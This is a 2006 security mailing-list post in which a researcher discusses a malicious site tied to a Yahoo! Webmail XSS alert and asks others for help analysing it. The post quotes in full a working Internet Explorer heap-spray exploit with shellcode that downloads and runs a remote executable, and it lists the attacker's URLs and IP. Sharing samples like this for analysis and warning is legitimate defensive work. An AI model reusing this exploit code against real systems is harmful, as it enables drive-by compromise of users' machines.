Dailydave mailing list archives
RE: [Argeniss] Alert - Yahoo! Webmail XSS
From: "C programming List" <cprog.list () gmail com>
Date: Tue, 18 Apr 2006 17:54:23 -0400
The top page a level above that is quite interesting too. Although I'd only recommend browsing it with wget and notepad, to be on the safe side. Should someone perhaps notify all those banks mentioned? (Then again, telling them "Watch out for suspicious CC transactions from eastern European nations" probably isn't telling them anything they don't already know....) cheers, DaveK
Looking at the front page on my regular browsers(firefox, galeon, konqueror) the 3 die, apparently from what I see, the browser makes repetitive call to mmap2 mmap2(NULL, 524288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x8af82000 I dont know what he wants, but apparently is just to map as much memory as possible. Anyone knows what script he uses to generate this ? THere is also http://www.w00tynetwork.com/news.htm which has what I beleive is an IE explorer exploit, maybe another browser, but windows oriented. <head> <meta http-equiv="refresh" content="2;url=news.htm"> </head> <input type="checkbox" id="javascript"> <SCRIPT language="javascript"> shellcode = unescape( "%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC" + "%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0" + "%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877" + "%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0" + "%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456" + "%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D" + "%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A" + "%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC" + "%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124" + "%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000" + "%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u6F61%u2E6C%u7865" + "%u0065%u7468%u7074%u2F3A%u772F%u7777%u772E%u3030%u7974%u656E%u7774%u726F%u2E6B%u6F63%u2F6D%u6962%u616E%u7972%u2E32%u7865%u0065%u0000"); bigblock = unescape("%u9090%u9090"); slackspace = 20 + shellcode.length while (bigblock.length < slackspace) bigblock += bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length + slackspace < 0x40000) block = block + block + fillblock; memory = new Array(); for ( i = 0; i < 2020; i++ ) memory[i] = block + shellcode; var r = document.getElementById('javascript').createTextRange(); </script> This shellcode downloads and execs this binary http://www.w00tynetwork.com/binary2.exe. Anyone knows what the binary does ? Ive tried to get the file that the xss is going to download but the address never replies. http://211.22.14.50/.yahoomail/x.htm A whois on the address gives a comany named Ceraco International Co., Ltd. Which I guess is s drone.. Anyone has any more on this web? -daniel
Current thread:
- [Argeniss] Alert - Yahoo! Webmail XSS Cesar (Apr 18)
- RE: [Argeniss] Alert - Yahoo! Webmail XSS Dave Korn (Apr 18)
- RE: [Argeniss] Alert - Yahoo! Webmail XSS El Nahual (Apr 18)
- <Possible follow-ups>
- RE: [Argeniss] Alert - Yahoo! Webmail XSS C programming List (Apr 18)